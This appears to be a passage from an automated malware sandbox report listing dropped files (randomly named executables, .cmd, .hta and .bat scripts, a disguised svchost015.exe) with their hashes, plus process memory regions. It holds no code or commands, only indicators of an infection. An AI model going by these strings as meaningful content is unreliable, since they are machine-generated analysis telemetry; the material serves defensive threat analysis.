                        9a8f3a6dd5a2ee6b29a558629ffe66170e09dac76e75f573382a3520af287a80

                        SHA512

                        c93871253c525a858f32451bc42783dea980e6bc15a786283e81e087e35ba423dd458fc46830985131ed0f1f95cda73e56e99c983e5743e110e3bfb2c1281d45

                      • C:\Users\Admin\AppData\Local\Temp\10381980101\7IIl2eE.exe

                        Filesize

                        1.2MB

                        MD5

                        7d842fd43659b1a8507b2555770fb23e

                        SHA1

                        3ae9e31388cbc02d4b68a264bbfaa6f98dd0c328

                        SHA256

                        66b181b9b35cbbdff3b8d16ca3c04e0ab34d16f5ebc55a9a8b476a1feded970a

                        SHA512

                        d7e0a845a1a4e02f0e0e9cf13aa8d0014587ebef1d9f3b16f7d3d9f3dc5cdc2a17aa969af81b5dc4f140b2d540820d39317b604785019f1cbfa50d785970493b

                      • C:\Users\Admin\AppData\Local\Temp\10381990101\TbV75ZR.exe

                        Filesize

                        991KB

                        MD5

                        beb1a5aac6f71ada04803c5c0223786f

                        SHA1

                        527db697b2b2b5e4a05146aed41025fc963bdbcc

                        SHA256

                        c2d045884d11777182129a96557ffc118ef0e8eb729b47766b4e003688d8c9c2

                        SHA512

                        d0fa9b0f749c0b78a491ad44990733f1d1292ca9b5a45fe8fec750fa716a067bf9926481e8a4a131063442c92f7671145fae2238f32bd1f444920f3ed8a9b243

                      • C:\Users\Admin\AppData\Local\Temp\10382000101\Rm3cVPI.exe

                        Filesize

                        354KB

                        MD5

                        27f0df9e1937b002dbd367826c7cfeaf

                        SHA1

                        7d66f804665b531746d1a94314b8f78343e3eb4f

                        SHA256

                        aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

                        SHA512

                        ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

                      • C:\Users\Admin\AppData\Local\Temp\10382011121\5YB5L4K.cmd

                        Filesize

                        1.4MB

                        MD5

                        2f0f5fb7efce1c965ff89e19a9625d60

                        SHA1

                        622ff9fe44be78dc07f92160d1341abb8d251ca6

                        SHA256

                        426b6e77a4d2e72edf8cd6177578a732ca05510b56cb58d938d6e25820dc2458

                        SHA512

                        b8587d32e98693f08c9c3776ac4168204d76dd6db0d76c6afc815d6727d745f6137ae83fe85a7562517b37c320ddebc27167a9f3f14dacca33954dbe437dc920

                      • C:\Users\Admin\AppData\Local\Temp\10382020101\kO2IdCz.exe

                        Filesize

                        158KB

                        MD5

                        6fa0611a9e1348246fa21da054dd95bb

                        SHA1

                        1b673314b0ba771d690d6f3bccf34082e2e4c294

                        SHA256

                        2e01911a0853b660f1583d50a8755a4a1f67f17ce6d19d3c24b9f61d1c13f01d

                        SHA512

                        e6168791c1ec105cb66263cef029eeea5592d1f495f5ada10bbbb4d669d757f69cab3a9c09e12b10943cac1dd03602a7ab1bf2fe687876ee8aef541990875759

                      • C:\Users\Admin\AppData\Local\Temp\10382030101\14c1ae9607.exe

                        Filesize

                        716KB

                        MD5

                        491c9c65917564864e1c3d945768660b

                        SHA1

                        082b63213f528d276c970651358277325b7d22d0

                        SHA256

                        f7b21658dc426f8e3535f6d2438ce6f6075227157683563644da9b528542025d

                        SHA512

                        f6b7252336708162f1b2257d8be52c684bf1fae04088e81a7c14a22c8de9e66593580954db2cdcf1d333f39dc8f2861c9aab264b0d095a6cb93cf4a43eaa1494

                      • C:\Users\Admin\AppData\Local\Temp\10382030101\14c1ae9607.exe

                        Filesize

                        358KB

                        MD5

                        70d99c31fb6024e3634497719c7dbc67

                        SHA1

                        813b9a9026b860929208f7006964b76badc65248

                        SHA256

                        bf15a54b74b8a29b078234d0a323c2e910fd7083cb93eea570b3ce5994b20fa1

                        SHA512

                        2784c087829476b51489ab87ce7d2838b9c56312ea3be0108e6dc82b1f8f74ba4553c0afac6b4c9dc34befb618758fd1c1c9e13a8400bd1e1dc4432f81784e7c

                      • C:\Users\Admin\AppData\Local\Temp\5GoKacj0L.hta

                        Filesize

                        717B

                        MD5

                        3c822ddd71c7e89f84fb64902cada425

                        SHA1

                        f1443ad82419cfb3cb8b708c2b1f052e09d79ce7

                        SHA256

                        8411ce37f99c1e6a93c7ba19e986d4c704ce558222aa961eb0d646ccc786d82f

                        SHA512

                        df299e67fadba68bbfee115ff81279c9515644ea185fb82aa3753eb1db02facb57c0154b436c91c87d59ee997f59dc87522d510367ef36572c2ba82e746f96f7

                      • C:\Users\Admin\AppData\Local\Temp\Expectations.cab.bat

                        Filesize

                        25KB

                        MD5

                        ccc575a89c40d35363d3fde0dc6d2a70

                        SHA1

                        7c068da9c9bb8c33b36aed898fbd39aa061c4ba4

                        SHA256

                        c3869bea8544908e2b56171d8cad584bd70d6a81651ca5c7338bb9f67249500e

                        SHA512

                        466d3399155a36f2ebc8908dba2838736a2effe4a337a3c49ff57afc59e3394f71c494daa70b02cb13461c3e89c6ad3889e6067a8938d29f832810d41f7d5826

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3C5V5SX1WFHKC5BDOSQA.temp

                        Filesize

                        7KB

                        MD5

                        309f10558d7ef59ccf7a16e7f1540328

                        SHA1

                        e23ce23b6c2866c8d0634b8923dc8a94914372c4

                        SHA256

                        bb62bad2e9f26c959c19ce27a2bbc8c33f6bba62dc661b8bb755d5765e7a2bc9

                        SHA512

                        466c0eeaa32026092b35c228183f79d9885dfb087afcb3385cf11438bf1cb80071c66bcb60565f267562921abc4839319112ecdb1e7368f3988a760594546497

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\db\data.safe.bin

                        Filesize

                        2KB

                        MD5

                        c3a35c687c7404ac37702183aef6a11b

                        SHA1

                        3baf87a363eb54ef8bb07b5e09b300318ee1cd94

                        SHA256

                        402d97fa970101508f8dc7abe99f4be6dd8e2fca3060a04a39345834db4021fd

                        SHA512

                        e1df8cdbbc0631b8dbe5d18d6044b974b3cca67838c10938cf8cb64f649a243d1480fb7361df2288427e4693ecb31934ce7890596a29e3c701f38b2177cee5de

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\pending_pings\cc734fcf-eaba-4e5d-b590-6497cfb8f686

                        Filesize

                        745B

                        MD5

                        0d636414413edbc9bc5e617f630464c9

                        SHA1

                        592691cbbbfdd9d584f7c20b7a5201ca9c6cd596

                        SHA256

                        f4ed3dcdf35c8e59297a28dd45f30be6e707b51fc8ee99b3c95226f384ee75f9

                        SHA512

                        3e77cf021ca9e5683967401703e362451e83f0275422ec94a5a2fc5464c31839dd51629179485dae747c57476105c259421d6cc66cadecad6a0f746fae460516

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\pending_pings\ef8f4e37-cd02-464a-a2ee-4b335009261c

                        Filesize

                        11KB

                        MD5

                        5a81ce80999482e7562df8b9b34e9178

                        SHA1

                        3599a7541db6f44575262333db1e0cfe7cbd5ad2

                        SHA256

                        990cf22e00465abf3a21d53f3194c74236ab52241ee43cb0a09c08697623ff84

                        SHA512

                        0277fcff40d7fbf5b8d1f75bf1533563097e90070b852ae97dc028c171e7ddd5daf5f0320e9d3b2bb8efd852671b712014932c3635c91a01d414c425959872c9

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\prefs-1.js

                        Filesize

                        6KB

                        MD5

                        d3402969d9d297a05ff35dfa044ad048

                        SHA1

                        357696eb46b2e16ce3d79cfd1ca24f7670d61942

                        SHA256

                        b85b238eff7eaa7f3d1a2164b3cf766a11a6c15f472e74b2a260507592f7a4fc

                        SHA512

                        810e8517d07bcc13dbfb7224fa2221cc7d549becdcaee51f6ff2b56eeab41af5562df1a9ee414cbe79740ffcbabff63f0c7f8b67cb4ebf6763bd2542b07604e1

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\prefs-1.js

                        Filesize

                        6KB

                        MD5

                        fda0929799a886dacdd9e99969ecd648

                        SHA1

                        77f4a8b2efd91696edf3724621e914c2b8d17ff3

                        SHA256

                        6d460e143b88bd59c865f3f35142e5193ebad08f8dd88f66857693da56e1a479

                        SHA512

                        87fbb1a057a66c9d81b6848033ce48ddae62ed3845a7b3f78f67b1b15bd009f7bf6e2ce3af468ae288e418cba6c243e9475b3c1e8036cd856e6e49eff01403c1

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\prefs.js

                        Filesize

                        6KB

                        MD5

                        df4c41d14b9c7f005d6764bd6025993e

                        SHA1

                        9cbb3816d00fab56924afae57549ead1f46b3443

                        SHA256

                        489f3d399a8dc8f32700f5a7ff0e73dbffd316c7764bad1e72bdaf6e5d9cd2e8

                        SHA512

                        f2c2f99b35540b1fa4aac055628617054efd87d68735012603c7d100bd4866be49ab22c5f3be6a52502ad3768908734948b70523e3561794a2f6f904602abb66

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\sessionstore-backups\recovery.jsonlz4

                        Filesize

                        4KB

                        MD5

                        02981d19717c3626ec6a1c39676ab273

                        SHA1

                        3c050c40356fba4de4fcb7308cfc3f71b3e2bb25

                        SHA256

                        22bd1392f9af7227acb1700dd57049915757fba1843e3f15150448c96a762a67

                        SHA512

                        4d677f5086a140965805b73d0982789e7f162fbe456b8aeafb30d78ac7478b8eea4c3ac0a0e5b1b1a389054c6d3b1feb61fcbadd00dddadf33ac7d56fbb63a71

                      • \Users\Admin\AppData\Local\TempKDO8US0NOAXZLRACYTF2DEVM0BJR81XR.EXE

                        Filesize

                        1.8MB

                        MD5

                        6ccf93c0cef65b2510ff1fcff52e7fb8

                        SHA1

                        3db6bf3e3f7ed0a0fb767b79171e9ad34c03b0d1

                        SHA256

                        8da34a9f000b0b4e40a66e3aa4739b089b55b26a95a0eb58cc0bff7d67ed8021

                        SHA512

                        757d0f599617574f2f08b8a1f252b9256b65c914c7f880479e86df9cdf39eb2bba1f4fcb9384d4915bd0fedc9cdbc7b5842cd95df8160d24a01e8d51ff836ae8

                      • \Users\Admin\AppData\Local\Temp\10381900101\c927d0c717.exe

                        Filesize

                        240KB

                        MD5

                        fdd55ad9190ca9a56c0d400d65b7504f

                        SHA1

                        cd2e1d9636fa035ec3c739a478b9f92bf3b52727

                        SHA256

                        79c986fd9c87542256a607eff10f5a2f84165b08bd9dd161e2d33e213607b487

                        SHA512

                        bea47ea7099e6922ffa60442e3f7010fdffa86e37a020e2fc30502b42a76ad5fbfd9780af988742b398fb9487744d4095912183157aa89ae40f31492b76e95cb

                      • \Users\Admin\AppData\Local\Temp\svchost015.exe

                        Filesize

                        2.9MB

                        MD5

                        b826dd92d78ea2526e465a34324ebeea

                        SHA1

                        bf8a0093acfd2eb93c102e1a5745fb080575372e

                        SHA256

                        7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

                        SHA512

                        1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

                      • memory/788-266-0x0000000000880000-0x0000000000CDE000-memory.dmp

                        Filesize

                        4.4MB

                      • memory/788-267-0x0000000000880000-0x0000000000CDE000-memory.dmp

                        Filesize

                        4.4MB

                      • memory/788-177-0x0000000000880000-0x0000000000CDE000-memory.dmp

                        Filesize

                        4.4MB

                      • memory/788-322-0x0000000000880000-0x0000000000CDE000-memory.dmp

                        Filesize

                        4.4MB

                      • memory/1756-551-0x0000000000400000-0x00000000008A2000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/1756-528-0x0000000000400000-0x00000000008A2000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/1820-76-0x0000000000AF0000-0x0000000001186000-memory.dmp

                        Filesize

                        6.6MB

                      • memory/1820-79-0x0000000000AF0000-0x0000000001186000-memory.dmp

                        Filesize

                        6.6MB

                      • memory/2188-396-0x0000000000E10000-0x00000000012C2000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-93-0x0000000006190000-0x0000000006826000-memory.dmp

                        Filesize

                        6.6MB

                      • memory/2188-293-0x0000000000E10000-0x00000000012C2000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-320-0x0000000006210000-0x00000000066BE000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-292-0x0000000006230000-0x000000000668E000-memory.dmp

                        Filesize

                        4.4MB

                      • memory/2188-71-0x0000000006120000-0x000000000642F000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2188-444-0x0000000000E10000-0x00000000012C2000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-290-0x0000000006230000-0x000000000668E000-memory.dmp

                        Filesize

                        4.4MB

                      • memory/2188-331-0x0000000000E10000-0x00000000012C2000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-77-0x0000000000E10000-0x00000000012C2000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-347-0x0000000006100000-0x0000000006B11000-memory.dmp

                        Filesize

                        10.1MB

                      • memory/2188-72-0x0000000006190000-0x0000000006826000-memory.dmp

                        Filesize

                        6.6MB

                      • memory/2188-173-0x0000000006230000-0x000000000668E000-memory.dmp

                        Filesize

                        4.4MB

                      • memory/2188-288-0x0000000006210000-0x00000000066BE000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-501-0x0000000000E10000-0x00000000012C2000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-50-0x0000000006120000-0x000000000642F000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2188-101-0x0000000000E10000-0x00000000012C2000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-532-0x0000000000E10000-0x00000000012C2000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-31-0x0000000000E10000-0x00000000012C2000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-34-0x0000000000E10000-0x00000000012C2000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-35-0x0000000000E10000-0x00000000012C2000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-368-0x0000000000E10000-0x00000000012C2000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-73-0x0000000006190000-0x0000000006826000-memory.dmp

                        Filesize

                        6.6MB

                      • memory/2188-379-0x0000000006100000-0x0000000006B11000-memory.dmp

                        Filesize

                        10.1MB

                      • memory/2188-75-0x0000000006120000-0x000000000642F000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2188-51-0x0000000006120000-0x000000000642F000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2188-287-0x0000000006210000-0x00000000066BE000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2188-174-0x0000000006230000-0x000000000668E000-memory.dmp

                        Filesize

                        4.4MB

                      • memory/2360-32-0x0000000000240000-0x00000000006F2000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2360-29-0x00000000066D0000-0x0000000006B82000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2360-14-0x0000000000240000-0x00000000006F2000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2412-53-0x0000000000260000-0x000000000056F000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2412-56-0x0000000000260000-0x000000000056F000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2700-15-0x0000000005EE0000-0x0000000006392000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2700-13-0x0000000005EE0000-0x0000000006392000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/3092-413-0x0000000000400000-0x0000000000CDA000-memory.dmp

                        Filesize

                        8.9MB

                      • memory/3192-546-0x0000000000400000-0x000000000068D000-memory.dmp

                        Filesize

                        2.6MB

                      • memory/3196-289-0x0000000001070000-0x000000000151E000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/3196-323-0x0000000001070000-0x000000000151E000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/3196-324-0x0000000001070000-0x000000000151E000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/3324-471-0x00000000003D0000-0x0000000000880000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/3392-407-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3392-467-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3392-401-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3392-403-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3392-406-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3392-409-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3392-411-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3392-414-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3620-1255-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

                        Filesize

                        32KB

                      • memory/3620-1254-0x000000001B3C0000-0x000000001B6A2000-memory.dmp

                        Filesize

                        2.9MB

                      • memory/3688-366-0x0000000000400000-0x0000000000E11000-memory.dmp

                        Filesize

                        10.1MB

                      • memory/3852-352-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3852-354-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3852-357-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3852-359-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3852-360-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3852-363-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3852-395-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3852-418-0x0000000010000000-0x000000001001C000-memory.dmp

                        Filesize

                        112KB

                      • memory/3852-442-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3852-364-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB

                      • memory/3852-367-0x0000000000400000-0x000000000042E000-memory.dmp

                        Filesize

                        184KB